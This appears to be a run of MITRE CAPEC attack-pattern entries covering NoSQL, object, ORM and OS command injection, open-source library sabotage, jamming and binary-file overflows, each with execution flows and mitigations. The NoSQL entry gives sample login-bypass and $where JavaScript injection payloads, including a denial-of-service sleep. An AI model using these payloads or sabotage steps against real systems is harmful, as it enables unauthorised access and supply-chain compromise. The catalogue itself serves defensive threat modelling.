ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	643	Identify Shared Files/Directories on System
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	664	Server Side Request Forgery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

None

Resources Required

Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1016	System Network Configuration Discovery
1049	System Network Connections Discovery
1590	Gather Victim Network Information

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Weaknesses
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-676: NoSQL Injection

Attack Pattern ID: 676

Abstraction: Standard

View customized information:

Description

Extended Description

NoSQL database calls are written in an application's programming language, via a custom API call, or formatted in a common convention (e.g., JSON, XML, etc.), any of which the adversary can exploit to achieve the aforementioned goals. NoSQL attacks usually result from improper sanitization and validation of data that originates from a user, either via special character or JavaScript injection. In both cases, the adversary crafts input strings so that when the target software constructs NoSQL statements based on the input, the resulting NoSQL statement performs actions other than those intended by the application. However, unlike traditional SQL Injection attacks, NoSQL injection attacks can also occur in instances where the application does not rely upon user input, as is the case in operator replacements. This entails the adversary overriding reserved NoSQL variable names with ones that have been modified with malicious functionality (e.g., $where in MongoDB). In all cases, depending on the NoSQL API and data model used, successful injection can cause information disclosure, data modification, and code execution at the application level.

Note: NoSQL Injection attacks are executed within a procedural language (e.g., C, C++, Perl), as opposed to the declarative SQL language itself. As a result, NoSQL injection attacks can potentially result in greater impacts than traditional SQL Injection attacks [REF-668].

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	248	Command Injection
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	460	HTTP Parameter Pollution (HPP)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Survey target application: Due to the number of NoSQL databases available and the numerous language/API combinations of each, the adversary must first survey the target application to learn what technologies are being leveraged and how they interact with user-driven data.

Techniques
Determine the technology stack leveraged by the target application, such as the application server, drivers, frameworks, APIs, and databases being utilized.
Identify areas of the application that interact with user input and may be involved with NoSQL queries.

Experiment

Identify user-controllable input susceptible to injection: After identifying the technology stack being used and where user-driven input is leveraged, determine the user-controllable input susceptible to injection such as authentication or search forms. For each user-controllable input that the adversary suspects is vulnerable to NoSQL injection, attempt to inject characters or keywords that have special meaning in the given NoSQL database or language (e.g., "$ne" for MongoDB or "$exists" for PHP/MongoDB), or JavaScript that can be executed within the application. The goal is to create a NoSQL query with an invalid syntax.

Techniques
Use web browser to inject input through text fields or through HTTP GET parameters.
Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
Use network-level packet injection tools such as netcat to inject input
Use modified client (modified by reverse engineering) to inject input.

Experiment with NoSQL Injection vulnerabilities: After determining that a given input is vulnerable to NoSQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, modify/delete information in the database, or execute commands on the server.

Techniques
Use public resources such as OWASP's "Testing for NoSQL Injection" [REF-668] or Null Sweep's "NoSQL Injection Cheatsheet" [REF-669] and try different approaches for adding logic to NoSQL queries.
Iteratively add logic to the NoSQL query and use detailed error messages from the server to debug the query.
Attempt an HTTP Parameter Pollution attack to replace language-specific keywords, such as "where" within PHP [CAPEC-460].

Exploit

Exploit NoSQL Injection vulnerability: After refining and adding various logic to NoSQL queries, craft and execute the underlying NoSQL query that will be used to attack the target system.
Techniques
Craft and Execute underlying NoSQL query

Prerequisites

Awareness of the technology stack being leveraged by the target application.

NoSQL queries used by the application to store, retrieve, or modify data.

User-controllable input that is not properly validated by the application as part of NoSQL queries.

Target potentially susceptible to operator replacement attacks.

Skills Required

[Level: Low]

For keyword and JavaScript injection attacks, it is fairly simple for someone with basic NoSQL knowledge to perform NoSQL injection, once the target's technology stack has been determined.

[Level: Medium]

For operator replacement attacks, the adversary must also have knowledge of HTTP Parameter Pollution attacks and how to conduct them.

Resources Required

None: No specialized resources are required to execute this type of attack.

Indicators

Too many false or invalid queries to the database, especially those caused by malformed input.

Executed queries or commands that appear to malicious in nature or originating from an untrustworthy source.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as relevant NoSQL and JavaScript content. NoSQL-specific keywords, such as $ne, $eq or $gt for MongoDB, must be filtered in addition to characters such as a single-quote(') or semicolons (;) based on the context in which they appear. Validation should also extend to expected types.

If possible, leverage safe APIs (e.g., PyMongo and Flask-PyMongo for Python and MongoDB) for queries as opposed to building queries from strings.

Ensure the most recent version of a NoSQL database and it's corresponding API are used by the application.

Use of custom error pages - Adversaries can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.

Exercise the principle of Least Privilege with regards to application accounts to minimize damage if a NoSQL injection attack is successful.

If using MongoDB, disable server-side JavaScript execution and leverage a sanitization module such as "mongo-sanitize".

If using PHP with MongoDB, ensure all special query operators (starting with $) use single quotes to prevent operator replacement attacks.

Additional mitigations will depend on the NoSQL database, API, and programming language leveraged by the application.

Example Instances

The following examples primarily cite MongoDB, PHP, and NodeJS attacks due to their prominence and popularity. However, please note that these attacks are not exclusive to this NoSQL instance, programming language, or runtime framework.

Within NodeJS, Login Bypass attacks are possible via MongoDB if user-input is not properly validated and sanitized [REF-670].

//NodeJS with Express.js

db.collection('users').find({

"user": req.query.user,
"password": req.query.password

});

The above code works fine if the user were to submit a query like the following:

https://example.org/login?user=patrick&password=1234

But an adversary could submit a malicious query such as the below, which would be interpreted by the code as follows:

https://example.org/login?user=patrick&password[$ne]=

//NodeJS with Express.js

db.collection('users').find({

"user": bob,
"password": {"&ne": ""}

});

This will result in a Login Bypass attack, as the query will succeed for all values where Bob's password is not an empty string.

MongoDB instances are also vulnerable to JavaScript Injection Attacks when user input is not properly validated and sanitized.

//PHP with MongoDB

db.collection.find({$where: function() {

return (this.username == $username) } } );

If the user properly specifies a username, then this code will execute as intended. However, an adversary can inject JavaScript into the "$username" variable to achieve a NoSQL Injection attack as follows:

//PHP with MongoDB

db.collection.find({$where: function() {

return (this.username == 'foo'; sleep(5000) ) } } );

This will result in the server sleeping for 5 seconds if the attack was successful. An adversary could supply a larger value to deny service to the application.

If leveraging PHP with MongoDB, operator replacement attacks are possible if special query operators are not properly addressed. The below example from OWASP's "Test for NoSQL Injection" displays a simple case of how this could occur.[REF-668]

db.myCollection.find({$where: function() {

return obj.credits - obj.debits < 0; } } );

Even though the above query does not depend on any user input, it is vulnerable to a NoSQL injection attack via operator replacement on the "$where" keyword. In this case, the adversary could exploit MongoDB in the following manner:

$where: function() { //arbitrary JavaScript here }

Related Weaknesses

CWE-ID	Weakness Name
943	Improper Neutralization of Special Elements in Data Query Logic
1286	Improper Validation of Syntactic Correctness of Input

References

[REF-669] Charlie Belmer. "NoSql Injection Cheatsheet". Null Sweep. 2021-06-07. <https://nullsweep.com/nosql-injection-cheatsheet/>. URL validated: 2021-09-30.

[REF-670] Patrick Spiegel. "NoSql Injection: Fun with Objects and Arrays". The OWASP Foundation. <https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf>. URL validated: 2021-09-30.

[REF-671] "NoSql Injection: Fun with Objects and ArraysNoSQL Injection Attacks and Prevention Techniques". WebOrion. 2019-06. <https://www.theweborion.com/wp-content/uploads/2019/06/NoSQL-Injection-Attacks-and-Prevention-Techniques.pdf>. URL validated: 2021-10-11.

Content History

Submissions
Submission Date	Submitter	Organization
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-586: Object Injection

Attack Pattern ID: 586

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

The target application must unserialize data before validation.

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption
Integrity	Modify Data
Authorization	Execute Unauthorized Commands

Mitigations

Implementation: Validate object before deserialization process

Design: Limit which types can be deserialized.

Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Use an allowlist of acceptable classes.

Implementation: Keep session state on the server, when possible.

Related Weaknesses

CWE-ID	Weakness Name
502	Deserialization of Untrusted Data

References

[REF-468] "Deserialization of Untrusted Data". OWASP. 2017-01.

Content History

Submissions
Submission Date	Submitter	Organization
2017-02-06 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-02-06 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations

CAPEC-109: Object Relational Mapping Injection

Attack Pattern ID: 109

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	66	SQL Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Determine Persistence Framework Used: An attacker tries to determine what persistence framework is used by the application in order to leverage a weakness in the generated data access layer code or a weakness in a way that the data access layer may have been used by the developer.

Techniques
An attacker provides input to the application in an attempt to induce an error screen that reveals a stack trace that gives an indication of the automated data access layer used. Or an attacker may simply make some educated guesses and assume, for instance, that Hibernate is used and try to craft an attack from there.

Probe for ORM Injection vulnerabilities: The attacker injects ORM syntax into user-controllable data inputs of the application to determine if it is possible modify data query structure and content.

Exploit

Perform SQL Injection through the generated data access layer: An attacker proceeds to exploit a weakness in the generated data access methods that does not properly separate control plane from the data plan, or potentially a particular way in which developer might have misused the generated code, to modify the structure of the executed SQL queries and/or inject entirely new SQL queries.
Techniques
An attacker uses normal SQL injection techniques and adjusts them to reflect the type of data access layer generation framework used by the application.

Prerequisites

An application uses data access layer generated by an ORM tool or framework

An application uses user supplied data in queries executed against the database

The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework

Skills Required

[Level: Medium]

Knowledge of general SQL injection techniques and subtleties of the ORM framework is needed

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Availability	Unreliable Execution
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework

Ensure to keep up to date with security relevant updates to the persistence framework used within your application.

Example Instances

When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer.

Related Weaknesses

CWE-ID	Weakness Name
20	Improper Input Validation
89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
564	SQL Injection: Hibernate

References

[REF-4] "OWASP Web Security Testing Guide". Testing for ORM Injection (OWASP-DV-007). The Open Web Application Security Project (OWASP). <http://www.owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.7-Testing_for_ORM_Injection>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses

CAPEC-607: Obstruction

Attack Pattern ID: 607

Abstraction: Meta

View customized information:

Description

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	547	Physical Destruction of Device or Component
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	582	Route Disabling
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	601	Jamming
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	603	Blockage
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	548	Contaminate Resource

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Communications, Social Engineering, Physical Security
Mechanisms of Attack	Manipulate System Resources

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Description Summary
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Description

CAPEC-538: Open-Source Library Manipulation

Attack Pattern ID: 538

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Execution Flow

Explore

Determine the relevant open-source code project to target: The adversary will make the selection based on various criteria:
- The open-source code currently in use on a selected target system.
- The depth in the dependency graph of the open source code in relationship to other code bases in use on the target system. Choosing an OSS lower in the graph decreases the probability of discovery, but also decreases the scope of its use within the target system.
- The programming language in which the open source code is implemented. Different languages present different opportunities for using known software weaknesses.
- The quality of processes in place to make a contribution. For instance, some contribution sites use static and dynamic analysis tools, which could increase the probability of discovery.
- The security requirements necessary to make a contribution. For instance, is the ownership lax allowing unsigned commits or anonymous users.

Experiment

Develop a plan for malicious contribution: The adversary develops a plan to contribute malicious code, taking the following into consideration:
- The adversary will probably avoid easy-to-find software weaknesses, especially ones that static and dynamic analysis tools are likely to discover.
- Common coding errors or missing edge cases of the algorithm, which can be explained away as being accidental, if discovered, will be preferred by the adversary.
- Sometimes no identity is required to make a contribution. Other options are to steal an existing identity or create one. When creating a new identity, strike a balance between too little or too much detail. Using an stolen identity could cause a notification to be sent to the actual user.

Exploit

Execute the plan for malicious contribution: Write the code to be contributed based on the plan and then submit the contribution. Multiple commits, possibly using multiple identities, will help obscure the attack. Monitor the contribution site to try to determine if the code has been uploaded to the target system.

Prerequisites

Access to the open source code base being used by the manufacturer in a system being developed or currently deployed at a victim location.

Skills Required

[Level: High]

Advanced knowledge about the inclusion and specific usage of an open source code project within system being targeted for infiltration.

Example Instances

An adversary with access to an open source code project introduces a hard-to-find bug in the software that allows under very specific conditions for encryption to be disabled on data streams. The adversary commits the change to the code which is picked up by a manufacturer who develops VPN software. It is eventually deployed at the victim's location where the very specific conditions are met giving the adversary the ability to sniff plaintext traffic thought to be encrypted. This can provide to the adversary access to sensitive data of the victim.

Related Weaknesses

CWE-ID	Weakness Name
494	Download of Code Without Integrity Check
829	Inclusion of Functionality from Untrusted Control Sphere

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.001	Supply Chain Compromise: Software Dependencies and Development Tools

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Description, Execution_Flow, Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated @Name, Description, Example_Instances, Execution_Flow, Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Execution_Flow, Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2021-06-24 (Version 3.5)	Open Source Libraries Altered

CAPEC-559: Orbital Jamming

Attack Pattern ID: 559

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	601	Jamming

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Manipulate System Resources

Prerequisites

This attack requires the knowledge of the satellite's coordinates for targeting.

Resources Required

A satellite uplink station.

Consequences

Scope	Impact	Likelihood
Availability	Other

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-462] Small Media. "Satellite Jamming in Iran: A War over Airwaves". 2012-11.

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-12 (Version 2.9)	Seamus Tuohy
2017-01-12 (Version 2.9)

CAPEC-88: OS Command Injection

Attack Pattern ID: 88

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	248	Command Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Identify inputs for OS commands: The attacker determines user controllable input that gets passed as part of a command to the underlying operating system.

Techniques
Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
Induce errors to find informative error messages

Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user
Techniques
Spidering web sites for all available links
Inventory all application inputs

Experiment

Vary inputs, looking for malicious results.: Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input, containing OS commands, to be passed to the application
Techniques
Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)

Exploit

Execute malicious commands: The attacker may steal information, install a back door access mechanism, elevate privileges or compromise the system in some other way.
Techniques
The attacker executes a command that stores sensitive information into a location where they can retrieve it later (perhaps using a different command injection).

Prerequisites

User controllable input used as part of commands to the underlying operating system.

Skills Required

[Level: High]

The attacker needs to have knowledge of not only the application to exploit but also the exact nature of commands that pertain to the target operating system. This may involve, though not always, knowledge of specific assembly commands for the platform.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges Bypass Protection Mechanism
Confidentiality	Read Data

Mitigations

Use language APIs rather than relying on passing data to the operating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable.

Filter all incoming data to escape or remove characters or strings that can be potentially misinterpreted as operating system or shell commands

All application processes should be run with the minimal privileges required. Also, processes must shed privileges as soon as they no longer require them.

Example Instances

A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line.

An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data.

See also: A vulnerability in Mozilla Firefox 1.x browser allows an attacker to execute arbitrary commands on the UNIX/Linux operating system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within back-ticks in the URL provided via the command line. This can be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4).

Related Weaknesses

CWE-ID	Weakness Name
78	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
88	Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
20	Improper Input Validation
697	Incorrect Comparison

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
31	OS Commanding

References

[REF-543] "Secunia Advisory SA16869: Firefox Command Line URL Shell Command Injection". Secunia Advisories. Secunia. 2005-09-20. <http://secunia.com/advisories/16869/>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Execution_Flow, Related_Weaknesses

CAPEC-44: Overflow Binary Resource File

Attack Pattern ID: 44

Abstraction: Detailed

View customized information:

Description

Extended Description

This attack pattern is a variant of standard buffer overflow attack using an unexpected vector (binary files) to wrap its attack and open up a new attack vector. The adversary is required to either directly serve the binary content to the victim, or place it in a locale like a MP3 sharing application for the victim to download. The adversary then is notified upon the download or otherwise locates the vulnerability opened up by the buffer overflow.

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	23	File Content Injection
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures, Inject Unexpected Items

Execution Flow

Explore

Identify target software: The adversary identifies software that uses external binary files in some way. This could be a file upload, downloading a file from a shared location, or other means.

Experiment

Find injection vector: The adversary creates a malicious binary file by altering the header to make the file seem shorter than it is. Additional bytes are added to the end of the file to be placed in the overflowed location. The adversary then deploys the file to the software to determine if a buffer overflow was successful.

Craft overflow content: Once the adversary has determined that this attack is viable, they will specially craft the binary file in a way that achieves the desired behavior. If the source code is available, the adversary can carefully craft the malicious file so that the return address is overwritten to an intended value. If the source code is not available, the adversary will iteratively alter the file in order to overwrite the return address correctly.

Techniques
Create malicious shellcode that will execute when the program execution is returned to it.
Use a NOP-sled in the overflow content to more easily "slide" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

Overflow the buffer: Once the adversary has constructed a file that will effectively overflow the targeted software in the intended way. The file is deployed to the software, either by serving it directly to the software or placing it in a shared location for a victim to load into the software.

Prerequisites

Target software processes binary resource files.

Target software contains a buffer overflow vulnerability reachable through input from a user-controllable binary resource file.

Skills Required

[Level: Medium]

To modify file, deceive client into downloading, locate and exploit remote stack or heap vulnerability

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Perform appropriate bounds checking on all buffers.

Design: Enforce principle of least privilege

Design: Static code analysis

